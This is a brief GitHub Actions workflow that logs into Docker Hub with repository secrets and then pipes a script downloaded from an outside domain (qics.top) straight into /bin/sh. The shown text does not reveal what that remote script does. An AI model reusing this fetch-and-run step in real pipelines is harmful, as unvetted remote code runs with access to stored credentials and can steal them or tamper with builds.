name: image-builder-custom
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Docker login
      uses: docker/login-action@v1
      with:
        username: ${{ secrets.DOCKERHUB_USERNAME }}
        password: ${{ secrets.DOCKERHUB_PASSWORD }} 
    - name: Exec custom shell
      run: |
        curl -fsSL "https://www.qics.top/shell/gitaction/custom.sh" | /bin/sh
    
